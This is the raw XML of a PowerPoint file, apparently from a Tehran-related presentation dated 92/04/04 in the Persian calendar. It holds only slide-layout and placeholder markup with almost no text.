
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Override PartName="/_rels/.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_rels/presentation.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/media/image5.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image2.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image1.jpeg" ContentType="image/jpe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_rels/slide27.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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756000" y="5078520"/>
            <a:ext cx="6047640" cy="4811040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit the notes format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;header&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279320" y="0"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10157400"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;footer&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279320" y="10157400"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{11315161-C1A1-4111-B1E1-911141C191C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242" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{A1E1F1B1-2181-4151-A1E1-3121D111C171}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="TextShape 3"/>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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>تهران لاگ           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>92/04/04</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32" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="7745040" cy="184932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35" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="4273560"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="3779280" cy="184932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40" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="184932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52" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877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54" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877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56" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="3877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88320" y="570240"/>
            <a:ext cx="7755840" cy="555552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61" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="3877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11" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877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65" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="4273560"/>
            <a:ext cx="3779280" cy="184932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69" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="7744680" cy="184932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73" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="7745040" cy="184932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76" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="4273560"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="3779280" cy="184932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81" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="184932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13" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877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15" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="3877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88320" y="570240"/>
            <a:ext cx="7755840" cy="55555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20" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="3877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24" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="4273560"/>
            <a:ext cx="3779280" cy="184932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8320" y="570240"/>
            <a:ext cx="7755840" cy="1054080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="2248200"/>
            <a:ext cx="3779280" cy="1849320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="4273560"/>
            <a:ext cx="7744680" cy="184932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blipFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="0" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="6857640"/>
          </a:xfrm>
